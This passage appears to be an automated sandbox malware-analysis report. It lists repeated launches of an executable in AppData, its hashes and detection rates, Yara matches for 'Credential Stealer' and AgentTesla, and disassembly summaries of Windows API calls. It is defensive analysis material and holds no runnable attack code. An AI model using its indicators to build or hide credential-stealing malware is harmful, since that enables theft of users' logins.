                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:5
                                          Start time:05:23:11
                                          Start date:26/09/2024
                                          Path:C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                                          Imagebase:0xc40000
                                          File size:644'608 bytes
                                          MD5 hash:5B35E1E6CDF0D5277FA8DCCD5FC06D26
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Antivirus matches:
                                          • Detection: 100%, Joe Sandbox ML
                                          • Detection: 29%, ReversingLabs
                                          Reputation:low
                                          Has exited:true

                                          General

                                          Target ID:6
                                          Start time:05:23:12
                                          Start date:26/09/2024
                                          Path:C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                                          Imagebase:0x80000
                                          File size:644'608 bytes
                                          MD5 hash:5B35E1E6CDF0D5277FA8DCCD5FC06D26
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:low
                                          Has exited:true

                                          General

                                          Target ID:7
                                          Start time:05:23:12
                                          Start date:26/09/2024
                                          Path:C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                                          Imagebase:0x230000
                                          File size:644'608 bytes
                                          MD5 hash:5B35E1E6CDF0D5277FA8DCCD5FC06D26
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:low
                                          Has exited:true

                                          General

                                          Target ID:8
                                          Start time:05:23:12
                                          Start date:26/09/2024
                                          Path:C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                                          Imagebase:0xdc0000
                                          File size:644'608 bytes
                                          MD5 hash:5B35E1E6CDF0D5277FA8DCCD5FC06D26
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1892988092.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.1892988092.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1894805275.0000000003171000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:true

                                          General

                                          Target ID:10
                                          Start time:05:23:19
                                          Start date:26/09/2024
                                          Path:C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                                          Imagebase:0x7e0000
                                          File size:644'608 bytes
                                          MD5 hash:5B35E1E6CDF0D5277FA8DCCD5FC06D26
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:low
                                          Has exited:true

                                          General

                                          Target ID:11
                                          Start time:05:23:20
                                          Start date:26/09/2024
                                          Path:C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                                          Imagebase:0xac0000
                                          File size:644'608 bytes
                                          MD5 hash:5B35E1E6CDF0D5277FA8DCCD5FC06D26
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.4141088444.0000000002F2B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:false

                                          Disassembly

                                          Reset < >

                                            Execution Graph

                                            Execution Coverage:7.4%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:88
                                            Total number of Limit Nodes:11
                                            execution_graph 36029 30fd01c 36030 30fd034 36029->36030 36031 30fd08e 36030->36031 36034 58f2c08 36030->36034 36042 58f1434 36030->36042 36036 58f2c18 36034->36036 36035 58f2c79 36060 58f155c 36035->36060 36036->36035 36038 58f2c69 36036->36038 36050 58f2d93 36038->36050 36055 58f2da0 36038->36055 36039 58f2c77 36043 58f143f 36042->36043 36044 58f2c79 36043->36044 36046 58f2c69 36043->36046 36045 58f155c CallWindowProcW 36044->36045 36047 58f2c77 36045->36047 36048 58f2d93 CallWindowProcW 36046->36048 36049 58f2da0 CallWindowProcW 36046->36049 36048->36047 36049->36047 36052 58f2da0 36050->36052 36051 58f2e40 36051->36039 36064 58f2e48 36052->36064 36068 58f2e58 36052->36068 36057 58f2db4 36055->36057 36056 58f2e40 36056->36039 36058 58f2e48 CallWindowProcW 36057->36058 36059 58f2e58 CallWindowProcW 36057->36059 36058->36056 36059->36056 36061 58f1567 36060->36061 36062 58f435a CallWindowProcW 36061->36062 36063 58f4309 36061->36063 36062->36063 36063->36039 36065 58f2e58 36064->36065 36066 58f2e69 36065->36066 36071 58f4292 36065->36071 36066->36051 36069 58f2e69 36068->36069 36070 58f4292 CallWindowProcW 36068->36070 36069->36051 36070->36069 36072 58f155c CallWindowProcW 36071->36072 36073 58f42aa 36072->36073 36073->36066 35993 324d340 35994 324d386 35993->35994 35998 324d520 35994->35998 36001 324d50f 35994->36001 35995 324d473 36005 324d0b8 35998->36005 36002 324d520 36001->36002 36003 324d0b8 DuplicateHandle 36002->36003 36004 324d54e 36003->36004 36004->35995 36006 324d588 DuplicateHandle 36005->36006 36007 324d54e 36006->36007 36007->35995 36074 324afb0 36075 324afbf 36074->36075 36078 324b097 36074->36078 36083 324b0a8 36074->36083 36079 324b0dc 36078->36079 36080 324b0b9 36078->36080 36079->36075 36080->36079 36081 324b2e0 GetModuleHandleW 36080->36081 36082 324b30d 36081->36082 36082->36075 36084 324b0b9 36083->36084 36085 324b0dc 36083->36085 36084->36085 36086 324b2e0 GetModuleHandleW 36084->36086 36085->36075 36087 324b30d 36086->36087 36087->36075 36088 7981e80 36089 798200b 36088->36089 36090 7981ea6 36088->36090 36090->36089 36094 79820f8 36090->36094 36098 7982192 36090->36098 36103 7982100 PostMessageW 36090->36103 36095 79820fb PostMessageW 36094->36095 36097 7982092 36094->36097 36096 798216c 36095->36096 36096->36090 36097->36090 36099 798212e PostMessageW 36098->36099 36102 7982197 36098->36102 36101 798216c 36099->36101 36101->36090 36102->36090 36104 798216c 36103->36104 36104->36090 36008 3244668 36009 324467a 36008->36009 36010 3244686 36009->36010 36012 3244779 36009->36012 36013 324479d 36012->36013 36017 3244879 36013->36017 36021 3244888 36013->36021 36018 3244888 36017->36018 36019 324498c 36018->36019 36025 32444b4 36018->36025 36023 32448af 36021->36023 36022 324498c 36022->36022 36023->36022 36024 32444b4 CreateActCtxA 36023->36024 36024->36022 36026 3245918 CreateActCtxA 36025->36026 36028 32459db 36026->36028

                                            Executed Functions

                                            Function 058F7358 Relevance: 3.3, Strings: 1, Instructions: 2027COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 316 58f7358-58f7361 318 58f7363-58f7393 316->318 319 58f72f1-58f7308 316->319 322 58f739a-58f7440 call 58f70e8 * 2 318->322 323 58f7395 318->323 319->316 336 58f744a-58f7456 call 58f70f8 322->336 323->322 338 58f745b-58f753a call 58f70f8 call 58f70e8 call 58f70f8 * 2 336->338 356 58f7544-58f7550 call 58f7108 338->356 358 58f7555-58f7582 call 58f7108 356->358 362 58f7587-58f759e 358->362 364 58f75a4-58f75c3 362->364 366 58f75cd-58f75e3 364->366 367 58f75ec-58f75f0 366->367 368 58f75f7-58f7610 367->368 370 58f7616-58f7620 368->370 371 58f7627-58f76b6 call 58f7118 370->371 372 58f7622 370->372 379 58f76be-58f76d0 371->379 372->371 380 58f76d8-58f8ebb call 58f70f8 call 58f7128 * 2 call 58f70f8 call 58f7138 call 58f7128 call 58f70f8 call 58f7148 call 58f7158 call 58f7168 call 58f7178 call 58f7188 call 58f7198 call 58f7148 call 58f7158 call 58f7168 call 58f7178 call 58f7188 call 58f7198 call 58f71a8 call 58f7158 call 58f7168 call 58f7188 call 58f7198 call 58f71a8 call 58f7158 call 58f7168 call 58f7188 call 58f7198 call 58f71b8 call 58f7158 call 58f7168 call 58f7188 call 58f7198 call 58f71a8 call 58f7158 call 58f7168 call 58f7188 call 58f7198 call 58f71a8 call 58f7158 call 58f7168 call 58f7188 call 58f7198 call 58f7148 call 58f71c8 call 58f7158 call 58f7168 call 58f7188 call 58f7198 call 58f7148 call 58f71c8 call 58f7158 call 58f7168 call 58f7188 call 58f7198 call 58f71a8 call 58f7158 call 58f7168 call 58f7188 call 58f7198 call 58f71d8 call 58f71e8 call 58f7158 call 58f7168 call 58f7188 call 58f7198 call 58f71f8 call 58f7208 call 58f71d8 * 2 call 58f71e8 call 58f7158 call 58f7168 call 58f7188 call 58f7198 call 58f71f8 call 58f7208 call 58f71a8 call 58f7158 call 58f7168 call 58f7188 call 58f7198 call 58f7218 * 2 call 58f7158 call 58f7168 call 58f7188 call 58f7198 call 58f71d8 * 4 call 58f71e8 379->380 683 58f8ebd-58f8ec9 380->683 684 58f8ee5 380->684 685 58f8ecb-58f8ed1 683->685 686 58f8ed3-58f8ed9 683->686 687 58f8eeb-58f95b9 call 58f7228 call 58f7158 call 58f7168 call 58f7188 call 58f7198 call 58f71f8 call 58f7208 call 58f71a8 call 58f7158 call 58f7168 call 58f7188 call 58f7198 call 58f7238 call 58f7248 call 58f7258 call 58f7218 * 14 call 58f7268 call 58f7168 call 58f7278 call 58f7288 * 2 684->687 688 58f8ee3 685->688 686->688 688->687
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1707324695.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58f0000_26.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Pp^q
                                            • API String ID: 0-3179448734
                                            • Opcode ID: 0b43d9e8dee3b06c17b0cd0b089fb52744d7c5c572271cb241c6e62345d0ed4a
                                            • Instruction ID: 6d95be1ac7bade924826c6f8de282069731617563251ec89e659dab9f0b6368c
                                            • Opcode Fuzzy Hash: 0b43d9e8dee3b06c17b0cd0b089fb52744d7c5c572271cb241c6e62345d0ed4a
                                            • Instruction Fuzzy Hash: 3B23D734A10219CFDB19DF68C898AD9B7B5FF89300F5141E9E909AB361DB31AE85CF41
                                            Function 058F7368 Relevance: 3.3, Strings: 1, Instructions: 2020COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 790 58f7368-58f7393 791 58f739a-58f7620 call 58f70e8 * 2 call 58f70f8 * 2 call 58f70e8 call 58f70f8 * 2 call 58f7108 * 2 790->791 792 58f7395 790->792 840 58f7627-58f76d0 call 58f7118 791->840 841 58f7622 791->841 792->791 849 58f76d8-58f8ebb call 58f70f8 call 58f7128 * 2 call 58f70f8 call 58f7138 call 58f7128 call 58f70f8 call 58f7148 call 58f7158 call 58f7168 call 58f7178 call 58f7188 call 58f7198 call 58f7148 call 58f7158 call 58f7168 call 58f7178 call 58f7188 call 58f7198 call 58f71a8 call 58f7158 call 58f7168 call 58f7188 call 58f7198 call 58f71a8 call 58f7158 call 58f7168 call 58f7188 call 58f7198 call 58f71b8 call 58f7158 call 58f7168 call 58f7188 call 58f7198 call 58f71a8 call 58f7158 call 58f7168 call 58f7188 call 58f7198 call 58f71a8 call 58f7158 call 58f7168 call 58f7188 call 58f7198 call 58f7148 call 58f71c8 call 58f7158 call 58f7168 call 58f7188 call 58f7198 call 58f7148 call 58f71c8 call 58f7158 call 58f7168 call 58f7188 call 58f7198 call 58f71a8 call 58f7158 call 58f7168 call 58f7188 call 58f7198 call 58f71d8 call 58f71e8 call 58f7158 call 58f7168 call 58f7188 call 58f7198 call 58f71f8 call 58f7208 call 58f71d8 * 2 call 58f71e8 call 58f7158 call 58f7168 call 58f7188 call 58f7198 call 58f71f8 call 58f7208 call 58f71a8 call 58f7158 call 58f7168 call 58f7188 call 58f7198 call 58f7218 * 2 call 58f7158 call 58f7168 call 58f7188 call 58f7198 call 58f71d8 * 4 call 58f71e8 840->849 841->840 1152 58f8ebd-58f8ec9 849->1152 1153 58f8ee5 849->1153 1154 58f8ecb-58f8ed1 1152->1154 1155 58f8ed3-58f8ed9 1152->1155 1156 58f8eeb-58f95b9 call 58f7228 call 58f7158 call 58f7168 call 58f7188 call 58f7198 call 58f71f8 call 58f7208 call 58f71a8 call 58f7158 call 58f7168 call 58f7188 call 58f7198 call 58f7238 call 58f7248 call 58f7258 call 58f7218 * 14 call 58f7268 call 58f7168 call 58f7278 call 58f7288 * 2 1153->1156 1157 58f8ee3 1154->1157 1155->1157 1157->1156
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1707324695.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58f0000_26.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Pp^q
                                            • API String ID: 0-3179448734
                                            • Opcode ID: 8b9fb48110adbb7edaef220f854f284c8d3f00781b3f19d323cf7db6a0af5e4b
                                            • Instruction ID: 8b6bd6d81f31c8b8ecc40c88283f9c4ab24297d57d74f4f91cd0688887272568
                                            • Opcode Fuzzy Hash: 8b9fb48110adbb7edaef220f854f284c8d3f00781b3f19d323cf7db6a0af5e4b
                                            • Instruction Fuzzy Hash: E923C734A10219CFDB19DF68C898AD9B7B5FF89300F5141E9E909AB361DB71AE85CF40
                                            Function 07981577 Relevance: .0, Instructions: 18COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1708887931.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7980000_26.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4e2d714f485b02126425c8b07d026b16e60192da3bd8d71f653919ed4164e308
                                            • Instruction ID: 5cdd0aab2c7ce0b50e6256099538030451a67243c7e1480d0577a8b194cbf0fc
                                            • Opcode Fuzzy Hash: 4e2d714f485b02126425c8b07d026b16e60192da3bd8d71f653919ed4164e308
                                            • Instruction Fuzzy Hash: C0D05B74E5E044CFC781BF7499545F4B9BCAF57244F0828D9554A97343E6B445018B19
                                            Function 0324B0A8 Relevance: 1.7, APIs: 1, Instructions: 195COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1292 324b0a8-324b0b7 1293 324b0e3-324b0e7 1292->1293 1294 324b0b9-324b0c6 call 3249b14 1292->1294 1296 324b0e9-324b0f3 1293->1296 1297 324b0fb-324b13c 1293->1297 1299 324b0dc 1294->1299 1300 324b0c8 1294->1300 1296->1297 1303 324b13e-324b146 1297->1303 1304 324b149-324b157 1297->1304 1299->1293 1347 324b0ce call 324b340 1300->1347 1348 324b0ce call 324b331 1300->1348 1303->1304 1305 324b159-324b15e 1304->1305 1306 324b17b-324b17d 1304->1306 1308 324b160-324b167 call 324ad10 1305->1308 1309 324b169 1305->1309 1311 324b180-324b187 1306->1311 1307 324b0d4-324b0d6 1307->1299 1310 324b218-324b2d8 1307->1310 1313 324b16b-324b179 1308->1313 1309->1313 1342 324b2e0-324b30b GetModuleHandleW 1310->1342 1343 324b2da-324b2dd 1310->1343 1314 324b194-324b19b 1311->1314 1315 324b189-324b191 1311->1315 1313->1311 1317 324b19d-324b1a5 1314->1317 1318 324b1a8-324b1b1 call 324ad20 1314->1318 1315->1314 1317->1318 1323 324b1b3-324b1bb 1318->1323 1324 324b1be-324b1c3 1318->1324 1323->1324 1325 324b1c5-324b1cc 1324->1325 1326 324b1e1-324b1ee 1324->1326 1325->1326 1328 324b1ce-324b1de call 324ad30 call 324ad40 1325->1328 1333 324b1f0-324b20e 1326->1333 1334 324b211-324b217 1326->1334 1328->1326 1333->1334 1344 324b314-324b328 1342->1344 1345 324b30d-324b313 1342->1345 1343->1342 1345->1344 1347->1307 1348->1307
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0324B2FE
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1704923028.0000000003240000.00000040.00000800.00020000.00000000.sdmp, Offset: 03240000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_3240000_26.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: 58db11759268a39646d93506c6b00d58c1e536fb2fe293995c9284677e419d5e
                                            • Instruction ID: 0bb9cdd7092e0afa2e81293e9026bb4364482a989c7d7fa47a72995ce0cba8a0
                                            • Opcode Fuzzy Hash: 58db11759268a39646d93506c6b00d58c1e536fb2fe293995c9284677e419d5e
                                            • Instruction Fuzzy Hash: 7A711370A10B068FD728DF2AD44579ABBF5FF88704F048A29D48A9BA50D775E885CB90
                                            Function 058F155C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1349 58f155c-58f42fc 1352 58f43ac-58f43cc call 58f1434 1349->1352 1353 58f4302-58f4307 1349->1353 1361 58f43cf-58f43dc 1352->1361 1354 58f435a-58f4392 CallWindowProcW 1353->1354 1355 58f4309-58f4340 1353->1355 1357 58f439b-58f43aa 1354->1357 1358 58f4394-58f439a 1354->1358 1363 58f4349-58f4358 1355->1363 1364 58f4342-58f4348 1355->1364 1357->1361 1358->1357 1363->1361 1364->1363
                                            APIs
                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 058F4381
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1707324695.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58f0000_26.jbxd
                                            Similarity
                                            • API ID: CallProcWindow
                                            • String ID:
                                            • API String ID: 2714655100-0
                                            • Opcode ID: 8543bab832316300d3bae9b02269fa27a3ee039f4e38a6eee0e59765fca5143e
                                            • Instruction ID: 7f92cb07463a60b9164685e17f82689bc0adfe8f1e93718bbd660fb7d667cd10
                                            • Opcode Fuzzy Hash: 8543bab832316300d3bae9b02269fa27a3ee039f4e38a6eee0e59765fca5143e
                                            • Instruction Fuzzy Hash: 0341EAB5900309DFCB14CF99C448AAABBF5FB88314F14C459EA19AB321D775A845CBA0
                                            Function 032444B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1366 32444b4-32459d9 CreateActCtxA 1369 32459e2-3245a3c 1366->1369 1370 32459db-32459e1 1366->1370 1377 3245a3e-3245a41 1369->1377 1378 3245a4b-3245a4f 1369->1378 1370->1369 1377->1378 1379 3245a60 1378->1379 1380 3245a51-3245a5d 1378->1380 1382 3245a61 1379->1382 1380->1379 1382->1382
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 032459C9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1704923028.0000000003240000.00000040.00000800.00020000.00000000.sdmp, Offset: 03240000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_3240000_26.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: 48f67c21cca681ad72303cc7c9866318dd1731385debcfcfaa605ba39e57066f
                                            • Instruction ID: fd6a9702245dabe1f922fa87b3f70da71ea6bffb15b7639263e2ed9c3c678de8
                                            • Opcode Fuzzy Hash: 48f67c21cca681ad72303cc7c9866318dd1731385debcfcfaa605ba39e57066f
                                            • Instruction Fuzzy Hash: C041D2B1C1061DCBDB24CFA9C88469EBBF5BF49304F24806AD448AB255DB756985CF90
                                            Function 0324590C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1383 324590c-32459d9 CreateActCtxA 1385 32459e2-3245a3c 1383->1385 1386 32459db-32459e1 1383->1386 1393 3245a3e-3245a41 1385->1393 1394 3245a4b-3245a4f 1385->1394 1386->1385 1393->1394 1395 3245a60 1394->1395 1396 3245a51-3245a5d 1394->1396 1398 3245a61 1395->1398 1396->1395 1398->1398
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 032459C9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1704923028.0000000003240000.00000040.00000800.00020000.00000000.sdmp, Offset: 03240000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_3240000_26.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: d8a87140790455707ba006cda58e4750727c95ffdf98041612037e6048dd352a
                                            • Instruction ID: 4b25dcfb20390f8a523bdfcb495ce381fd3ac37355917ac63f34faa3611dbb11
                                            • Opcode Fuzzy Hash: d8a87140790455707ba006cda58e4750727c95ffdf98041612037e6048dd352a
                                            • Instruction Fuzzy Hash: 2941D1B1C00719CFDB24CFA9C884BDEBBB5BF49304F24816AD448AB255DB756986CF90
                                            Function 07982192 Relevance: 1.6, APIs: 1, Instructions: 83windowCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1399 7982192-7982195 1400 798212e-7982143 1399->1400 1401 7982197-7982198 1399->1401 1404 798214d-798216a PostMessageW 1400->1404 1405 7982145-7982148 1400->1405 1402 798219a-79821c5 1401->1402 1403 7982213 1401->1403 1407 79821cc-79821df 1402->1407 1408 79821c7 1402->1408 1406 7982215-798221e 1403->1406 1409 798216c-7982172 1404->1409 1410 7982173-7982187 1404->1410 1405->1404 1414 79821f0-798220b 1407->1414 1415 79821e1-79821ee 1407->1415 1408->1407 1409->1410 1414->1406 1418 798220d 1414->1418 1415->1414 1418->1403
                                            APIs
                                            • PostMessageW.USER32(?,?,?,?), ref: 0798215D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1708887931.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7980000_26.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            • Opcode ID: 07ef2acc554f3fe41d61801ba9bcd827bf4b94d82dc8cd53d7ebf16dc8bb8f89
                                            • Instruction ID: 7fbab7333d1efd3a918cae5f721cff4f48fa2f313793ef300ae0570f95988123
                                            • Opcode Fuzzy Hash: 07ef2acc554f3fe41d61801ba9bcd827bf4b94d82dc8cd53d7ebf16dc8bb8f89
                                            • Instruction Fuzzy Hash: 3731DFB6E042698EDF11EFA8D8047EEBFF4FF89315F14805AD904A7281C7385944CBA0
                                            Function 079820F8 Relevance: 1.6, APIs: 1, Instructions: 77windowCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1419 79820f8-79820f9 1420 79820fb-798216a PostMessageW 1419->1420 1421 7982092-79820cf 1419->1421 1422 798216c-7982172 1420->1422 1423 7982173-7982187 1420->1423 1425 79820d8-79820ec 1421->1425 1426 79820d1-79820d7 1421->1426 1422->1423 1426->1425
                                            APIs
                                            • PostMessageW.USER32(?,?,?,?), ref: 0798215D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1708887931.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7980000_26.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            • Opcode ID: 1f17ac2256232016fc46a5b5af18eac2b9e796d46c534dff171c301d2d999085
                                            • Instruction ID: d23361f0114226c7f0302925417065213ede4dfa57a34ed5f0c9ecf0eb913902
                                            • Opcode Fuzzy Hash: 1f17ac2256232016fc46a5b5af18eac2b9e796d46c534dff171c301d2d999085
                                            • Instruction Fuzzy Hash: 343102B5800309DFDB10DF99D885BDEBBF8FB48324F20841AE558A7250C379A584CFA1
                                            Function 0324D0B8 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1429 324d0b8-324d61c DuplicateHandle 1431 324d625-324d642 1429->1431 1432 324d61e-324d624 1429->1432 1432->1431
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0324D54E,?,?,?,?,?), ref: 0324D60F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1704923028.0000000003240000.00000040.00000800.00020000.00000000.sdmp, Offset: 03240000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_3240000_26.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 5bf8f53d8570fe091da89c63b22c3ae186248444f05fb027e455280e2f570ad4
                                            • Instruction ID: 88d3ac9bbd85b7b00ca49d081148b56562203a66ad74d36ae8d519ebdca86097
                                            • Opcode Fuzzy Hash: 5bf8f53d8570fe091da89c63b22c3ae186248444f05fb027e455280e2f570ad4
                                            • Instruction Fuzzy Hash: 902114B5900208EFDB10CF9AD984ADEFFF8EB48310F14841AE918A7311D378A954CFA4
                                            Function 0324D581 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1435 324d581-324d61c DuplicateHandle 1436 324d625-324d642 1435->1436 1437 324d61e-324d624 1435->1437 1437->1436
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0324D54E,?,?,?,?,?), ref: 0324D60F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1704923028.0000000003240000.00000040.00000800.00020000.00000000.sdmp, Offset: 03240000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_3240000_26.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 11fbaf578117c3a2333e8f12a3cb140e52ab6a9d6338fc9e56316ed4858b0795
                                            • Instruction ID: 8be9646ffac1ae1964284d8870e41964e890a973faddd2960df98e326af4f36e
                                            • Opcode Fuzzy Hash: 11fbaf578117c3a2333e8f12a3cb140e52ab6a9d6338fc9e56316ed4858b0795
                                            • Instruction Fuzzy Hash: 7521E2B5D00209DFDB10CFA9D584AEEBBF5FB08310F14841AE918A7311D378A950CFA5
                                            Function 0324B298 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1440 324b298-324b2d8 1441 324b2e0-324b30b GetModuleHandleW 1440->1441 1442 324b2da-324b2dd 1440->1442 1443 324b314-324b328 1441->1443 1444 324b30d-324b313 1441->1444 1442->1441 1444->1443
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0324B2FE
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1704923028.0000000003240000.00000040.00000800.00020000.00000000.sdmp, Offset: 03240000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_3240000_26.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: bbf9436f41eefcbcb11b733557f0b73d8ac77720383ecbcb47d14d929884b2ed
                                            • Instruction ID: cc12be9522ff611afa96ab73f4923ea4e70e348b9e26a9c772a548f0779f6e3f
                                            • Opcode Fuzzy Hash: bbf9436f41eefcbcb11b733557f0b73d8ac77720383ecbcb47d14d929884b2ed
                                            • Instruction Fuzzy Hash: 1511E0B5C003498FCB14CF9AC444ADEFBF8EF88324F14842AD459A7610D379A585CFA5
                                            Function 07982100 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1446 7982100-798216a PostMessageW 1447 798216c-7982172 1446->1447 1448 7982173-7982187 1446->1448 1447->1448
                                            APIs
                                            • PostMessageW.USER32(?,?,?,?), ref: 0798215D
